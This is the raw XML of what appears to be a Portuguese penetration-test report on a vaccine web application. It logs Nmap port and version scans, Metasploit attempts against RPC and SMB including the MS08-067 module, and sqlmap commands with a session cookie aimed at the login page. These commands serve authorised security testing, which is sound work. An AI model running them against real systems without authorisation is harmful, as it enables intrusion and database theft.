        <w:t>pode ser desenvolvida a partir disso.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“-Ss” permite que a ferramenta tente fazer o scan SYN do TCP.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Erro na ferramenta.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“-sS” permite que a ferramenta tente fazer o scan SYN do TCP.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E01CAE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Passou no teste.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>Conforme a Figura 4, a ferramenta conseguiu escanear todas as portas abertas e exibir os serviços que estavam rodando nessas portas.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6DB215F0" wp14:editId="64008954">
            <wp:extent cx="5715000" cy="4038600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="9" name="Imagem 9" descr="Descrição: scanningN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ção: scanningNma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4 - Portas encontradas e os serviços que estavam rodando nelas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comando:  nmap -sV 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busque a versão do software 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Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pP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e as versões dos sistemas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Resultados: </w:t>
      </w:r>
      <w:r w:rsidRPr="00E01CAE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Passou no teste. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Conforme a Figura 5 foi possível escanear as portas abertas e identificar a versão dos sistemas que estavam rodando nelas.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03A14026" wp14:editId="5C26A31B">
            <wp:extent cx="5705475" cy="3819525"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="8" name="Imagem 8" descr="Descrição: scanningNm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ção: scanningNmap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5 - Portas escaneadas e versões dos sistemas que elas estavam rodando.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 xml:space="preserve">Serviços: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5B3078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  <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D62225">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Microsoft Windows RPC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Ferramenta </w:t>
      </w:r>
      <w:r w:rsidRPr="00D62225">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">semelhante ao TeamViewer </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">que conecta o computador criando um esquema de servidor - cliente;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Microsoft Windows microsoft-ds</w:t>
      </w:r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8A79EE" w:rsidRPr="00D62225" w:rsidRDefault="008A79EE" w:rsidP="00D62225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 nmap -sU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permite que a ferramenta utilize o detector de portas UDP.</w:t>
      </w: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2C52C4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2C52C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>IP_do_servidor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> informa</w:t>
      </w:r>
      <w:r w:rsidRPr="002C52C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">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as portas UDP abertas, e as versões dos sistemas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Resultado: </w:t>
      </w:r>
      <w:r w:rsidRPr="00F05851">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Passou no teste.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>Conforme a Figura 6, foi possível identificar as portas UDP abertas e os serviços que elas estavam rodando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514C3094" wp14:editId="72F07B93">
            <wp:extent cx="5667375" cy="3981450"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="7" name="Imagem 7" descr="Descrição: scanningNm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ção: scanningNmap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6 - Portas UDP escaneadas e serviços que estavam rodando nelas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D6222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Serviços:</w:t>
      </w:r>
      <w:r w:rsidR="00D62225" w:rsidRPr="00B71318">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B71318">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>ntp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> [3] - protocolo de sincronização de relógios usando UDP;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netbios-ns</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> - responsável pelo registro de nomes de aplicação do NetBios [4]; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00174603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 -dgm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> - serviço de datagrams do NetBios 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</w:t>
      </w:r>
      <w:r w:rsidRPr="00E15301">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>nmp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> [5] - gerenciamento de redes;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microsoft-ds - protocolo windows para compartilhamento e impressões de arquivos;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L2TP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> - protocolo de encapsulamento de camada 2, para criar redes vpn privadas;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="006F6948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nat-t-like</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> - protocolo de tradução de ips.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-A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“-A” é para usar o </w:t>
      </w:r>
      <w:r w:rsidRPr="008A79EE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Tracerout</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidRPr="00D62225">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>er</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> na requisição.</w:t>
      </w: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8A79EE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IP_do_servidor informa o IP onde está hospedada a </w:t>
      </w:r>
      <w:r w:rsidRPr="008A79EE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>aplicação em teste.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Esperava-se descobrir a rota traçada pelo Tracerouter.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teste. Conforme as Figura 7 e 8, foi possível identificar a rota traçada pelo Tracerouter.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A79EE" w:rsidRDefault="008A79EE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A79EE" w:rsidRDefault="008A79EE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0EC1A021" wp14:editId="3528D0DB">
            <wp:extent cx="5343525" cy="3702812"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="6" name="Imagem 6" descr="Descrição: scanningNma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ção: scanningNmap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0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7 - Rota traçada pelo Tracerouter - Parte 1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79E1243E" wp14:editId="4D3851B0">
            <wp:extent cx="5343525" cy="3723461"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="5" name="Imagem 5" descr="Descrição: scanningNma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ção: scanningNmap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2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8 - Rota traçada pelo Tracerouter - Parte 2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-sV -p 1-65535 -O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buscar a versão do software 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devem ser usadas no teste, o delimitador é “-”.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S.O.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em teste.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="006876BB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876B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a versão dos softwares que estavam rodando nas portas escaneadas.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teste. Conforme a Figura 9, foi possível identificar a versão dos softwares que estavam rodando nas portas escaneadas.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04A2ADD3" wp14:editId="6FF325CE">
            <wp:extent cx="5695950" cy="4067175"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="4" name="Imagem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9 -  Versão do software rodando nas portas escaneadas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-sU -p 1-65535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permite que a ferramenta use o detector de portas UDP.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876B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a versão dos softwares que estavam rodando nas portas UDP escaneadas.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6876BB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Passou no teste.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5DFE4BD7" wp14:editId="7FB0689E">
            <wp:extent cx="5705475" cy="4314825"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="3" name="Imagem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10 - Versão do software rodando nas portas UDP escaneadas.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rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="006F6982" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista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F6982">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Ataque à porta RPC - via Nmap</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="006F6982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Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="2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10/04/16.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Ataque à porta RPC descoberta na análise de servidor via Nmap realizada anteriormente.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se conectar à porta 135 usando o framework Metasploit para tentar conseguir privilégios dentro do Windows.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Tentar configurar algum exploit que ataque a porta 135.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Resultado: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">A ferramenta </w:t>
      </w:r>
      <w:r w:rsidRPr="00174603">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">é de difícil configuração e possui documentação muito ruim para iniciantes. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Não foi possível obter grandes resultados.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D037A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">O exploit escolhido para testar o caso específico da porta RPC foi o </w:t>
      </w:r>
      <w:r w:rsidRPr="007D037A"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>.</w:t>
      </w:r>
      <w:r w:rsidRPr="007D037A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> O payload a ser</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">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O exploit foi enviado mas não trouxe resultado. Após verificação, </w:t>
      </w:r>
      <w:r w:rsidRPr="007D037A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>foi constatado que o exploit é voltado pra Windows NT.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atacar a porta 445 usando exploits automatizados.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Para esse caso, o exploit escolhido foi o MS08-67 disponível no caminho </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">/windows/smb/ms08_067_netapi. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Ele serve especificamente para explorar uma vulnerabilidade do </w:t>
      </w:r>
      <w:r w:rsidRPr="000D3326">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>microsoft ds</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">. O payload é o utilizado na tentativa 2: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atacar a porta 135.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exploit escolhido foi o </w:t>
      </w:r>
      <w:r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 xml:space="preserve">  para testar o caso específico da porta RPC escolhida. O payload a ser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70782B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7D037A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2.3  Tela de Login – Sqlmap</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
        <w:ind w:left="1416" w:firstLine="708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Tarefa realizada no dia 11/04</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00834FAA" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="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Duração: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">2 horas </w:t>
      </w:r>
      <w:r w:rsidRPr="00834FAA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>e 30 min</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>utos.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 a ferramenta Sqlmap</w:t>
      </w:r>
      <w:r w:rsidRPr="00834FAA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> para automatizar o processo de detecção de vulnerabilidades na tela de </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Login fazendo uso </w:t>
      </w:r>
      <w:r w:rsidRPr="00834FAA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>injeção SQL.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b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Resultados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Tentativa 1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Verificar se a tela de Login é vul</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">nerável a injeção de código SQL. Caso haja vulnerabilidade, </w:t>
      </w:r>
      <w:r w:rsidRPr="00834FAA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>conseguir obter o nome do banco de dados utilizado pelo sistema.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Para realizar essa ten</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>tativa foi necessário utilizar a ferramenta</w:t>
      </w:r>
      <w:r w:rsidRPr="00834FAA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> Burp Suite </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">para </w:t>
      </w:r>
      <w:r w:rsidRPr="00834FAA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">capturar as informações </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">de cookie contidas no cabeçalho de requisição </w:t>
      </w:r>
      <w:r w:rsidRPr="00834FAA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">HTTP no </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>momento em que a página do L</w:t>
      </w:r>
      <w:r w:rsidRPr="00834FAA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>ogin é acessada.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 wp14:anchorId="2DAA7CB8" wp14:editId="007F7A7C">
            <wp:extent cx="5463397" cy="4097547"/>
            <wp:effectExtent l="0" t="0" r="4445" b="0"/>
            <wp:docPr id="14" name="Imagem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13" cy="410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Figura 11-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00834FAA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Par</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>âmet</w:t>
      </w:r>
      <w:r w:rsidRPr="00834FAA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>ros obtidos através do Burp Suite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D32318">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Entrada: 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  <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A79EE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>./Sqlmap.py -u "</w:t>
      </w:r>
      <w:hyperlink r:id="rId19" w:history="1">
        <w:r w:rsidRPr="008A79EE">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:i/>
            <w:color w:val="000000"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://IP_do_servidor/vacina/login.php?logado=false</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="008A79EE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">" 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  <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A79EE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">--cookie="PHSESSID=75ce718b37088517cafla733d53c60f"  -b  --current -db </w:t>
      </w:r>
      <w:r w:rsidRPr="008A79EE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve"> 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“./sqlmap.py” comando utilizado para executar a ferramenta Sqlmap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>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“-u” utilizado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 xml:space="preserve"> para especificar a URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> alvo da página a ser explorada.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“--cookie” utilizado para especificar um cookie de sessão válido a ser passado para o Sqlmap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> durante o ataque.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“--current -db”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>utilizado para obter o</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> nome do banco de dados utilizado pela aplicação</w:t>
      </w:r>
      <w:r w:rsidRPr="002719E7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia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Esperava-se que a tela de Login não fosse vulnerável à injeção de SQL e consequentemente não fosse possível descobrir o nome do banco de dados utilizado pela aplicação.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b/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pP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 w:rsidRPr="002719E7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</w:t>
      </w:r>
      <w:r w:rsidRPr="00D32318">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Passou n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>o teste. As figuras 12, 13 e 14 mostram os resultados do Sqlmap.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358AA025" wp14:editId="222E6EA8">
            <wp:extent cx="5303240" cy="4076700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="13" name="Imagem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>Figura 11 - Resultado aplicação SQL Injection via Sqlmap. Parte 1.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-142"/>
        <w:jc w:val="center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6A57DF59" wp14:editId="48203BA3">
            <wp:extent cx="5200768" cy="3857625"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="12" name="Imagem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32" cy="38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>Figura 12 - Resultado aplicação SQL Injection via Sqlmap. Parte 2.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179CC20C" wp14:editId="73CCF410">
            <wp:extent cx="5305425" cy="4006657"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="11" name="Imagem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820" cy="400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lastRenderedPageBreak/>
        <w:t>Figura 13 - Resultado aplicação SQL Injection via Sqlmap. Parte 3.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1B2F09">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Tentativa 2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Repetir a ação da tentativa 1</w:t>
      </w:r>
      <w:r w:rsidRPr="001B2F09">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> e aumentar o </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">nível de heurística aplicada pelo Sqlmap na injeção de SQL </w:t>
      </w:r>
      <w:r w:rsidRPr="001B2F09">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>para o valor máximo: 5.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Entrada: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="008A79EE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  <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A79EE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>./Sqlmap.py -u "</w:t>
      </w:r>
      <w:hyperlink r:id="rId23" w:history="1">
        <w:r w:rsidRPr="008A79EE">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="000000"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://IP_do_servidor/vacina/login.php?logado=false</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="008A79EE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>" –b</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="008A79EE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  <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A79EE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>--cookie="PHSESSID=75ce718b37088517cafla733d53c60f" --current -db  --level 5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“--current -db”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 xml:space="preserve">evel 5” </w:t>
      </w:r>
      <w:r w:rsidRPr="002719E7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">comando utilizado </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>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 w:firstLine="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Esperava-se que a tela de Login não fosse vulnerável à injeção de SQL e consequentemente não fosse possível descobrir o nome do banco de dados utilizado pela aplicação.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Passou no teste. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Embora</w:t>
      </w:r>
      <w:r w:rsidRPr="001B2F0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tendo aumentado o nível da</w:t>
      </w:r>
      <w:r w:rsidRPr="001B2F09">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
